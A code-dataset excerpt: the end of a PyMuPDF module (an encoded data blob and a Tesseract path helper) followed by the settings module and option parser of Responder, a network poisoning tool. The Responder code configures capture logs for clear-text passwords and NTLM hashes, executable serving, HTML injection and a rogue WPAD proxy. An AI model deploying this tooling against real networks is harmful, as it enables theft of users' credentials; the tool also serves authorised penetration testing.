b'1m2b9KhAmAOvR93YEAj3odEUG/OljQ9XBgnb2IWh7c73hCc6DGk3tUtHqFZnA5Rmn1lSjU'
b'6oMtoD5o8vymYONSy6ngX1cuAhzcNTD83sT6pI/rIkSqp5HLSFt4h5ZuQTZhszLy/CYXQ6'
b'N0m/iAFfisTpJ6ehvAf60R6OZ+WVuQPch5VLphyasbnkz8wfUgqiHrKbWSpY/vFS6ZfjsL'
b'k8mOXaFYnfeXz1q7lFxTC5+N9t/G7BgtBLtzOWgjQkNeQxLJdmgoQF0txgmIPYY7F5pWg7'
b'aUE2nEyLrPmhpwQpgV3/nWcOUT/U6ipyJrrNBfFEd7eAVmuEqMhqjXCe/EGtO03+kKM0Nb'
b'/3ygCGgDp9l5EcGVmXxK4MjSui46N0DM1f1ea/00lErSPqQVNZFVEzTeW5pjidClRQaTwy'
b'1os8/gfPlX0H/l/9XGlUETfWq4T1PT/Xzo+Hjtc6KI1xlfyhl0xRhqKLtZPkD2eCNMdn1D'
b'HA3cBTlRjd8REUMUUGNcWA0X2AbWVfe43woGKNuP5+O4unMT7yZbkBM6S7Gsu6mAo08moZ'
b'7rCBhWYCjdwaRpyaSqCRW8OQ+mqxOmAj15bj33y1WBOwkWvDifOnFGjk1jLc9f8Wmgg0cm'
b'sY/p1XCxUCjdyCIZ3qInG10Ru5IKN8Wiis+U5rTWWFpvJUU6H2emTcejx+1Qg8I24ERHmR'
b'j7E2xiTCU9IzpRoL74G0gronQJpVhPjnPRQs2zTBb7RwF1x6z0YeZwuE4T8T6n59Mq+wto'
b'K4W2PThSDRQB+8mlGLw2EbQzKQ5XxJ3bP8zbMe8tHUgVQjYNpY+BbkA5op+mBNdQxgLrr1'
b'6ZorjEtBWaWBKGVVwvVGqILH6Nz/ArTavZuA9NsbRSKbPjnxjdvwRKyOsCsZxt3IDK4dYc'
b'oQbkVWIJcJp2asYqtETdIcrfcNJ0l8NwdpbaI2A61N1DQdWRkgK9ZmQxBjo1nCVIu/KXjO'
b'SvSayRj3J7tTQuNOcx8ElYsy0W8spSD9rhamqcdgK4X5bnhLoUVcsVUU2WpHCYPKMZrTzw'
b'zt92GKJpByJqdAfnaYQ/L5J6PQQd9qCKGwgsJUChIUJsTdPfGBHTtPZRE6mpsALOg6IGZL'
b'YFVi0n1UKwB5asmgk08IjA4eM2BdbgvSb52x49UH5fL0btWucvxTt3fm3NwxMlVeKDoqXw'
b'plTrcZiU/b8bBq0Xhcre3IGTNCfz1my8hR27EzZoz8OXYALe0H19qOoYKNfDuOH15rO4oK'
b'NnJtOXGyqoCNXFtOGGJrO5AGcOTesWSQre1QGsCRe8uKM6sM2Mi14/iBtrbjqWAj15YjQ2'
b'1tR1TBRq7JsZ2tXezPeIsdoF6pdJUFaBS7VuVlcXWoyRxeOvIFHW9o3gZSXUNfoQfTCyaY'
b'eB3DoXkSA6cfKT9sOEv7GYyhGw3ou0AKMkbXUJiAzv0Dfbi5LATDfHt3tdiQOny02ODg8b'
b'JCbuHRTawTi46Pi881HBsNzhxL3DogNpJnf0X0yjxx4fFo1cIJN178gU5g8WjlI18oNA7d'
b'xRofZ19acLyOkbt8HZs/urQj5cd+ZIVZMiiurJuh2uyZ2bXs0THJmYOPvXfJgVCvjtSMRX'
b'eEmo46QjTXnlZ0PEvJL23ZXxjE7UVZNv06y1UTZ0C0RjeLOFr0RcQJa57ZMheO223ImjaG'
b'9Lm1WczSAWVkxbYCKQM/RydfMMs6aqPBAqlx5wzYqBZChYaGHIjmaYgoOj+A0ovOC2g6yn'
b'NUI4giJwQgnOj48KOVreWCtNewUhL6Cg1y9bVEqaFH9xIxyOsTopOA+u16BekteAXf2kKc'
b'3mD7rcRbPL2lCL7edoX4Z3/KdoZoQ9bPPKH7N/iOzh8gW6PzB5qO8h+hIRij+yjNLbNonL'
b'xVTrTnq90l+2Y53InIrw93NskoTycB0TfuBfRWjubJdzP0BkvnZ55wqbLCj1bY6+QkCnvj'
b'vrXOWBYAN0GnMqSrcvS7iZWzZk5svJbUMOTNaC2pWQDU+nlt6KCfk9Z3dDBqfQmHpiOrHs'
b'YGfRn/b4cLYnzbdq9rA+3DyX4Kuu+ejZaTuu+wnBIjQfXzeNAOiGBK5Btsnlna22RMHb/f'
b'8/+dXCmC6h/wS3hmLbfw3gfnaE9ODCmBW7Lv9enM0mHeS2Fp7cRB3oUVRc592hRcuk57qT'
b'3oPVUO0I485t1YUWRfxIUh9Cw56VkPSD/rKVP3HVVFBK+mQitQ29c1LVNm9lNf3OmgG2Zz'
b'y8ay/PO6qAhhSpVZQu6Yg5Z1iuZYGcWMpEoN7YcK6DpCRs7grUP13u30SIUm0D0Mdt8sd9'
b'+jx9nmib+bccL9tFPXqaetckOPmmBmwKs2aN2OGyHK3j9iUdrPNNfEoyKyB0WEebYDxgtE'
b'Dr5aH3K43j3PkhuPVtBdtBu8JKD6A5RjdK2WpqP+oAVj3z8MO7v41AQyrD4pMFosUrhsmU'
b'4N9nXoURs5TjgBZosbeDS2oMp2+m7NLEtGpjEspK/mgnU2MH6GTWUHqHF6aZFggFdq4NYZ'
b'lYl14Ed1F4B6QLO1iB7jlx4KhnYOik3tKg8G+zoH3bKwc6JqQw/nOsp/h2lzOgeJQd3c0W'
b'JS1wrgjeqcFzGjc5HrHTjnJD7EMgmgnGKZKkyOsdQOdIZ4COzxLHflQ3E7baNVs4qAGoVL'
b'0vrCtpoAbwSSa/NSh+jnkVaLMoLDnXqrBUvScPSzSPAw0bC+hK9wTyJZtr60D74yDUfRrB'
b'K538I64ikMo6TlltzZFUlef2Fo9kCXvXJvlQmTBVodcEDQBwyww1R+px4RMbHoUQRj2/Yh'
b'zkx0vduo25xaYNRvlha96jgri497ThaRvtKOgvDYoD0yaL+dmB4x6xLNxH5CVE1pIss00S'
b'kidI8OGPe6Dr7qdR0ed7EEo6xiH7rlzceSKlbd3pxvmJmvoCJpOihIGjVfwxlwtriGxU/M'
b'FC/LKzT4cLwh1INFaqCgl1lBlAhzDYSgHCzOGkUHV0StvlCj1vZP5jFRqtT8pCnKwsGmTi'
b'l6dzmsz91ooYU8PZKhhukJeaPpaCRDTvW7i3o7ZmmB6MCzAfe9tc+hijHKKcY+nK6WdKYW'
b'Hq3oWHRkPdI6MF7lKZNblh/zJDb6KAwdHyilxt6zz48WZmx4o/tLl8ktcxEmkqc82Ef0f4'
b'YhyZBqwDTuwnBZBPKWvfqKbD9UGq96WHRAGBQNEA+JpYXCgGiAW8OhEUUPhsZlNBQaRA+E'
b'BpBhcGYoGQSXjvRDoHEsA6CJTg9/hh0/MbwS6HLkfsDbBuPwHvU7NnefeWcyQuaCyPhYGc'
b'iNjojL2XBnK/sZ7TQRs4c3K/epFekZ6oq+bhz1K1p4QeTcDT6pVrIwWDwec0d19O4eyi+6'
b'E5KudKvUdNQqIeWw6zcXI6uxtV6/OQW/9ixjzh7zkCdcdBKTZGQk2l+4GIt+T35WNmlIhX'
b'UhJNudC80m9lPXPAduzE6w+4yeWVOYPLM2TU6y1IQWbnRSPVlpHPbwwAswpp7a89zs0lF+'
b'08vcyw394mHL1w4x2M9nzkV4HslzfEjPTzQSXHnKhNsK9bB+6eGJUXtwd6BxVOqpgf6XmS'
b'P3JjTvFDWGzMKTJvCFp5zs3E70oYXzCddJKZ2bcIHRYLYDzWqjd1RpR3ZJ1rqiB++odo68'
b'+bHHvZymbF5RQ8zcw5Ueb7Q4HYN1GMolWtKpSHu1yhBarTIAn6TQPTqHbaLxkjPXCYjGj1'
b'XUE4uO1+0zC8c9e+mCGNkP5haNR4bSgqO+nU1IrwMiGnsqgs+RMyccFd1BhlI0ZziuG2Tp'
b'ODfaI0RVFmH2Wx38recOCwdz2UmHQ7YcxS4PW6rVNEwjpbsTZHH0pqymo+5kmcSvhxYUht'
b'q9tURLkbgLLyPh0B4ZrHlKC90IqsRGHQg2ZUsE8zZcXtfRvU6LhLbNUAr04dw5yYdneyQj'
b'c5Q1VeB7UHJqNyNH2/JaOpjyklbbvhXJ0fvcGbGr17nz5BytCa5IjzTzBUPvmaYoRcvkHC'
b'0frhQdnUmegHF+7bqdvuf8vOZBZxP0V6qXc34Y5ZRab6C2IzJoxgYM+ilIe1kn5s1nbZUP'
b'hiyDFfjG6Mu3DdBXnMPqV4mMeNDPW6IqGiBe30eVNOjYQp7F+3D1OGTDPLLw1Wl7eDEXjy'
b'bnsFiWWyK+q6VKgUZWCZRVnX+CLnCOVsYaQ8sCGmTQBw6mqAjdrccG5nSoLimfkxw941AS'
b'u3Hp6zzzjPHFAZMFOVcPP1QGDQfcTcC3bjjAAOI5V0E3ZO35cO9ZvSs8U+hI/KlhxbV7Vl'
b'vwRtRT4VxF3ZJ1fRtChaKJ7sUpFR01CjrcdS9bngvNeGZNSK9TmDh2PSft3WbQd7BNPOOP'
b'jksHgcGkK4XTkLeUY8MQRXdpKFEtKUpY2aFTqpZ8KO1sXx1lhp3DhXOKDBfOGTBcOGfIk6'
b'6GDZpi97UPM+pZY4Fo6kUwOuJQkPa9oiF0t+iA0C8aIPQ7+cTQI/uXBUEuNT1jpBndwViP'
b'eNFFjJVm+tX+KLSrKxlRH3QvkzWGHlXTuQGv2ox1O66+jA99Qfdnfzqb+zdyCzzyMGLGd+'
b'VA2ieCavtpTnqk9ntkxE/U7KxfzWZnwhlNaIUxnr42yXiX3uSNgUYzU+P0GM+WFoLJPGgS'
b'IKmtTB60SqOvhLs2UybEHQ9Z8vPFnCYRdkaMVmOTVZtYb+r8SOUgASYWGMKBktoi6ogJS9'
b'Ye2tF302eCnsx7cpzrhens4gY3TDENGyXDeXhuP4NXB6i5+MwiIQczDdyaj7vw/YzcBaAW'
b'r50DPUufeSjM0x0Uz9RzD4a5uoNudUhOVD1fd66jGbvDbh0SLy1LT+eda+nnnJMwpZ8L4C'
b'f1zotb7TNHUdoY4t2aJ7NB7RjSU7o06MPkLjg/Tyeprr9E1Y3u5kKdje7m0nQ0dhgGmtFV'
b'I514xqiNenzcRLNkPDmoHDJqoHQoz7yFR7Wcoj+xkLNdyR01RORmuNzvnJPSeeARERajXV'
b'azUDSDmFrQz+Yciozv9506PEShedIxDBulQ+LBxKAv0YtmlERd/eBOlFDm6FrxCsqtNmAp'
b'QUerJJBUvwfNNhFdVYX+IrqqStNR2TIgxIPs//NMc9qnrbUca4uIIXdGs0FaXLktPRac1R'
b'7a9xsHVQZ67M29Ms3SUGbZjxNVEnw8GB2o8WrutbDShd01hkAzRn+/8ATZwmlgj45m22GC'
b'fUSf0Jkb5GiePf0uV7YCl991ok8Uz266sqZMOR+I/i5bImq/70bHhC4CqrWMGwjZHWv3o0'
b'uTnGWRB6mn/ZA1803ZqXnSW+zOFeRNdhGC3Efo18SR5cd+/bRBsHziwRC7R16aPrXEkTtA'
b'zdwSPMRPa1jagPLZWr4013NO5D7DRCoCwlTKwWEyRSCaNBjAGHZSceNnmmlCc7J7RYRVdA'
b'eMN1gcfLXB4vB4g4XgNrrIDrmnVzPQcvUEe7Yi7W/BMIS+lccB4coOAvoE9czQ8RyQ88vr'
b'KU3DJn41u2jYEcQa7MQAXoW1lNZhPRKUWCLeOKtG5NHNYKgP0c1gmo46FlSPy/g2D47Sl/'
b'F1HosrMDoZjSx67XZflZ7ROEQGWu8kaGm5Q2SwNH4O57ewNZw7RDSGIp9OHSYaYOUBCZkB'
b'8WauPONH0D8MqbSjmnSQOQ3kLc3IhOr1IuN1dLNO4bDvIboPmZCjdajaAkGDMkCsP2UWCt'
b'qTAW7pTiYpWnMyLiO9ySC3tCYjtNaZjEspSMMO+tLMkV5bMo6lSI0c8m5OY7JQK0PGtVeF'
b'HNEfN0bRnCa8RhnxXeR2tXlyMes5GaK9KLM/UuqylxqkuxqtXCYXubwMIYaFFUeEy8saDc'
b'hKS5VEz4HmyWWzDt1HkYIOt41VlpSzIZDd2yFCRH3b2CKQ3jMmxIJJ9HnAJBlzhQXRVmmA'
b'nQDpUkUjdxItS4DqpjAIKTeUQUptJmnI8C4xSH3tD8LR14lBd7i4C8qaif30V860M0uraC'
b'muvqCsbSwdhbi0mFxQtgIdX1DGHNeQzhDk3ZUdMmTUtxSVye3lYXjVt1Ogz7+EO8yQqZKZ'
b'6Ogu148YrzyoluQq43J08xOkj1RGlAVX4PytQcVK0eYS7QlTIJD2m2u3uqvJFe4vJ6Jb9x'
b'TxnJ/s7cyy9QQlJxdaMRt8u2eRvsgLPCTQiqMtbzQonsg2158tCk/ox4ebMeh1SBO44fgL'
b'HzAPc4jcn4bK8DI2xPeYO0kBEaL8ZQKsdT0v37+Mn8qGwnc1/E2L5Gr0m4+xaPBD3UAPtz'
b'ZW8GrldBXgq1czG5S7f5KY/qP7rCoPSCeA6HVvh6yRboXfusVaOjRZ0le1LgN4y+45wr3F'
b'cwRqW2cwbgWSJtdhaEwHkSZf2cWXyVfZSyvwrbfSLB0MlEjrW4or0NwsWJIRtgdyRZbFCA'
b'hLkgYMS5KWNKe4oAE3QgWt2GDaz2pC5G0IL7uhZ/sahhkEqXo9qEHRS88YW78q3XI+JTlS'
b'LRtiV5rlguhYsVwC1JkzA23ejeDuiu8TzAg6qRYCcBKrngabLCOOPo8yizjhjaI4LAfWAK'
b'Pbb9vkq5/LIE16WWMFt2iC+uEkNHcL+TrkaV1/iJ3WR31XPObpDvNNRADdTgBGHS+qoJ6r'
b'VxDImJjefGe8HTN1UjxTG602yf9isEoPOoB58lU6XVQlP/hVSGxQ+ZHjeiyeoeLogW01TV'
b'5ZyFXy6rsVJPl1re4snYHUhzdWoPXhDU1H8i7IkGBqUOM+tG49qAMkeFZ2uAWF+2ou1uME'
b'ncF+fbs9hCE169ewU8g4R89ImtBfw0uUYTV9GjNib3WZvKpnhpbJa2i5pSXETB3d8Ksaz2'
b'uSaosN85BX1dKhO73q3axZChq+OSbwFuo0RSqixkoHIV+Rnk7dmwrJvKZUwyFNFvTFkAaQ'
b'Rwox0CrAzWWAL2cOh07VHeOFmEn7HZ4qB2i/1278Cstk9T2mDmFqHaHb2huT/GJRRYi7NJ'
b'zn4LjlZSqRclw7x8PrwV+kY5yEk3g8kn7lRrOXls2kfS+IRX7tRrNTz+b94ryja7SmVX6H'
b'L4tRLs2G/m46Zjccab4LxPjzb+PxRl2H9jTYCAZcFhVnLgmnMw0Yy4mTWG0/lr48/7fFu/'
b'r7TiStLhnQF7+X0GLsQjNRFHpBfDYBrVuNoaWZQOaoW0ce6SXXWQZa+9Z0pNQhQwbzMMmM'
b'H5HdC1noSf1GUIY4pL9GeEbfTLmF/KrPysFV6L1RB98OZqK0Sjj3xHDzpxqB82Xypza3zp'
b'JgT4lZ1p+6F4LTqBdqkj+jEx3QCf7kBUpNm0SWjui4xawRmfynkrXNEz4EBD30bb3ehA57'
b'2ib6tnRouG8yM18mcnF6Rlz1ZFkSXaNuvOmlLNJ68JiC1uOGpqOByDAkmhTUfs3h1e+6Ut'
b'yroSn3oI7iCozqwgJcrdqXcB7Ko7ZEGCaq5E3P9JG8qIAsLdPgInlTCuB0TtLcCB+GsGUW'
b'wFg3ZF6Od4pXxvWtkbCMGaORcB5zxzvNqFgRf7TlDIXk7Xp7GlPwt6vdaegmb7eNKzD+vn'
b'3HuALV9e2WccXMBGa3LIezXTcJGYc6oSoi029MU5nncZsmokZbQ16dDq8ZwHG9RRN4Q9sM'
b'JhbzCI8fxjI8fXHZlBl5vLmCgwYHKDYETAUbH7VnVXasGGcFOPdhijKDDF55YIm4bYpmaj'
b'/9agumUm+91oGRC1rwgvxgdIhY+sMb+mmMFWzD8eYYhYi6G6RtMA9mm48wT1NkmJYZMEzL'
b'DBlNsTKH6PsyVk0KMaID4ag0QxC5Zji62deKjnqWkgypDSiwqzuvoe29XV163V6BUT+C/s'
b'g8VmLPJ6AgBt1PGmFVh2ZieJNttIxJfgtv72KWJkvgLMmX4alDIe9ZAryXaR5D+oJRlCtt'
b'4uZIpR+skDN6sIIoftrBShkGLiQhOvGNIC4qg9EJRAfAS0VHGVyQIVVpAup03z/pPrZxWD'
b'+c+8c+ejQDQxp4u/4MPUTDVYBv+ZqRPS7GwoNa7CswKkbGrroVdowX3XuwJ9Xj5HJF2i8Y'
b'r5JvHFvnyTd9WA36xjdZRCbPO2/wrS8cIK2MOmuSI6NOBnVt1FkZNBh1Gldjo04G16szXJ'
b'mhR0e4JgC1jSdD+qN7xIRbHVhFCRs0visQvfW39fEPtSnPGN/M2adlaT9D1xABoXNwcOge'
b'AGhtCSn1S+VVi28ZqWeWcCM1an0KwBp+8tO+sV4tzJcYVjraj9ezPPkWLeAgtpuWk2hS37'
b'pbJ6NRAaITtgg/OmFL+mh2rybmK2z/WFrtX5UG8FtSltJ7Sh4Jm0oWiXeVbLB6s8gi0W6R'
b'hfSukEXUzo8F9HkXi/jtHUuZZvT7wLfOqAusAngYDg7PJpNFwK0MwFD3ndEakhGdR0ShbD'
b'vdnOYEzKK/vko+I6oLj+HcLr3KcG4U3zL5Fh0rQwWOjpWRPgzqPnBUQW0lwoYRDYwQNToR'
b'A/fRiRjQ0s/D79gsABOib2GDDQmK7OEReGQPP0/+7a59v0z+H+SUGTTsMAEA'
)).decode().splitlines()
def get_tessdata() -> str:
"""Detect Tesseract-OCR and return its language support folder.
This function can be used to enable OCR via Tesseract even if the
environment variable TESSDATA_PREFIX has not been set.
If the value of TESSDATA_PREFIX is None, the function tries to locate
Tesseract-OCR and fills the required variable.
Returns:
Folder name of tessdata if Tesseract-OCR is available, otherwise False.
"""
TESSDATA_PREFIX = os.getenv("TESSDATA_PREFIX")
if TESSDATA_PREFIX != None:
return TESSDATA_PREFIX
if sys.platform == "win32":
tessdata = "C:\\Program Files\\Tesseract-OCR\\tessdata"
else:
tessdata = "/usr/share/tesseract-ocr/4.00/tessdata"
if os.path.exists(tessdata):
return tessdata
"""
Try to locate the tesseract-ocr installation.
"""
# Windows systems:
if sys.platform == "win32":
try:
response = os.popen("where tesseract").read().strip()
except:
response = ""
if not response:
print("Tesseract-OCR is not installed")
return False
dirname = os.path.dirname(response) # path of tesseract.exe
tessdata = os.path.join(dirname, "tessdata") # language support
if os.path.exists(tessdata): # all ok?
return tessdata
else: # should not happen!
print("unexpected: Tesseract-OCR has no 'tessdata' folder", file=sys.stderr)
return False
# Unix-like systems:
try:
response = os.popen("whereis tesseract-ocr").read().strip().split()
except:
response = ""
if len(response) != 2: # if not 2 tokens: no tesseract-ocr
print("Tesseract-OCR is not installed")
return False
# determine tessdata via iteration over subfolders
tessdata = None
for sub_response in response.iterdir():
for sub_sub in sub_response.iterdir():
if str(sub_sub).endswith("tessdata"):
tessdata = sub_sub
break
if tessdata != None:
return tessdata
else:
print(
"unexpected: tesseract-ocr has no 'tessdata' folder",
file=sys.stderr,
)
return False
return False
%}
| 81,757 | Python | .pyt | 1,973 | 35.428789 | 139 | 0.692846 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,385 | settings.py | SpiderLabs_Responder/settings.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import utils
import ConfigParser
from utils import *
__version__ = 'Responder 2.3'
class Settings:
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return str.upper() == 'ON'
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
if options.Interface is None and utils.IsOsX() is False:
print utils.color("Error: -I <if> mandatory option is missing", 1)
sys.exit(-1)
# Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
# Servers
self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS'))
self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB'))
self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL'))
self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP'))
self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP'))
self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP'))
self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP'))
self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP'))
self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS'))
self.Krb_On_Off = self.toBool(config.get('Responder Core', 'Kerberos'))
# Db File
self.DatabaseFile = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
# Log Files
self.LogDir = os.path.join(self.ResponderPATH, 'logs')
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'SessionLog'))
self.PoisonersLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'PoisonersLog'))
self.AnalyzeLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog'))
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(config.get('HTTP Server', 'Serve-Exe'))
self.Serve_Always = self.toBool(config.get('HTTP Server', 'Serve-Always'))
self.Serve_Html = self.toBool(config.get('HTTP Server', 'Serve-Html'))
self.Html_Filename = config.get('HTTP Server', 'HtmlFilename')
self.Exe_Filename = config.get('HTTP Server', 'ExeFilename')
self.Exe_DlName = config.get('HTTP Server', 'ExeDownloadName')
self.WPAD_Script = config.get('HTTP Server', 'WPADScript')
self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject')
if not os.path.exists(self.Html_Filename):
print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
if not os.path.exists(self.Exe_Filename):
print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
# SSL Options
self.SSLKey = config.get('HTTPS Server', 'SSLKey')
self.SSLCert = config.get('HTTPS Server', 'SSLCert')
# Respond to hosts
self.RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
self.RespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
self.DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
# Auto Ignore List
self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
self.AutoIgnoreList = []
# CLI options
self.LM_On_Off = options.LM_On_Off
self.WPAD_On_Off = options.WPAD_On_Off
self.Wredirect = options.Wredirect
self.NBTNSDomain = options.NBTNSDomain
self.Basic = options.Basic
self.Finger_On_Off = options.Finger
self.Interface = options.Interface
self.OURIP = options.OURIP
self.Force_WPAD_Auth = options.Force_WPAD_Auth
self.Upstream_Proxy = options.Upstream_Proxy
self.AnalyzeMode = options.Analyze
self.Verbose = options.Verbose
self.CommandLine = str(sys.argv)
if self.HtmlToInject is None:
self.HtmlToInject = ''
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = config.get('Responder Core', 'Challenge')
if len(self.NumChal) is not 16:
print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logging.warning('Responder Started: %s' % self.CommandLine)
logging.warning('Responder Config: %s' % str(self))
Formatter = logging.Formatter('%(asctime)s - %(message)s')
PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
PLog_Handler.setLevel(logging.INFO)
ALog_Handler.setLevel(logging.INFO)
PLog_Handler.setFormatter(Formatter)
ALog_Handler.setFormatter(Formatter)
self.PoisonersLogger = logging.getLogger('Poisoners Log')
self.PoisonersLogger.addHandler(PLog_Handler)
self.AnalyzeLogger = logging.getLogger('Analyze Log')
self.AnalyzeLogger.addHandler(ALog_Handler)
def init():
global Config
Config = Settings()
| 8,817 | Python | .py | 171 | 48.245614 | 139 | 0.691682 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,386 | Responder.py | SpiderLabs_Responder/Responder.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import optparse
import ssl
from SocketServer import TCPServer, UDPServer, ThreadingMixIn
from threading import Thread
from utils import *
banner()
parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
parser.add_option('-I','--interface', action="store", help="Network interface to use", dest="Interface", metavar="eth0", default=None)
parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
parser.add_option('-r', '--wredir', action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
parser.add_option('-d', '--NBTNSdomain', action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
parser.add_option('-f','--fingerprint', action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
